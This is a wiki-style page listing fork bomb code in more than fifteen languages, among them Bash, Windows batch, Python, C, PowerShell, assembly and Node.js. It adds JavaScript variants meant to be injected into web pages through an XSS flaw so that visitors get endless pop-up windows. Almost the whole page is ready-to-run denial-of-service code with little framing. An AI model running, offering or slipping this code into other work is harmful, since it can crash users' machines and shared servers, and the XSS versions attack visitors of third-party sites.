Examples of fork bombs

From Glitchdata
Jump to navigation Jump to search

Template:Article for deletion/dated

This page lists some examples of fork bombs in different programming languages.

Examples

Bash

:(){ :|:& };:

The trick here is that : is a function name — otherwise it is identical to bomb() { bomb | bomb & }; bomb.

Same as above, but encoded into a standalone shell script as opposed to a shell function:

#!/bin/bash
./$0|./$0&

Windows batch

:s
start "" %0
goto s

The same as above, but shorter:

%0|%0

Combining the two:

:s
start "" %0
%0|%0
goto s

The same as above, but done in command line using ^ to escape specials:

echo %0^|%0 > forkbomb.bat
forkbomb.bat

Perl

An inline shell example using the Perl interpreter:

perl -e "fork while fork" &

PHP

<?php
while(true) {
    pcntl_fork();
}

Python

import os
while 1:
    os.fork()

Java

public class ForkBomb {
    public static void main(String[] args) {
        while(true) {
            Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
        }
    }
}

Ruby

loop {
    fork {
        load(__FILE__)
    }
}

Haskell

import Control.Monad (forever)
import System.Posix.Process (forkProcess)

forkBomb = forever $ forkProcess forkBomb

main = forkBomb

Common Lisp (Clozure CL)

(loop (#_fork))

C

#include <unistd.h>

int main(void) {
    while(1) {
        fork(); /* malloc can be used in order to increase the data usage */
    }
}

C++

#include <unistd.h> 
int main(void) {
    while(1)
        fork();
    return 0;
}

C# (.NET)

static void Main() {
    while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}

Visual Basic .NET

Do
    System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True

Assembly (Netwide Assembler code for Linux running on a IA-32 CPU)

section .text
    global _start
    
_start:
    mov eax,2 ;System call for forking
    int 0x80  ;Call kernel
    jmp _start

PowerShell

while($true) { 
    Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
    Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}

JavaScript

JavaScript code can be injected into a web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

while (true) {
    var w = window.open();
    w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}

Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:

<a href="#" onload="function() {while (true) {var w = window.open(); w.document.write(document.documentElement.outerHTML || document.documentElement.innerHTML);}}">XSS fork bomb</a>

Or, a more aggressive version:

setInterval(function() {
    var w = window.open();
    w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);

Node.js, using JavaScript

(function f() {require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']);}());

This can also be run using shell, similar to approach it uses in inside:

node -e "(function f() {require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']);}());"

See also

External links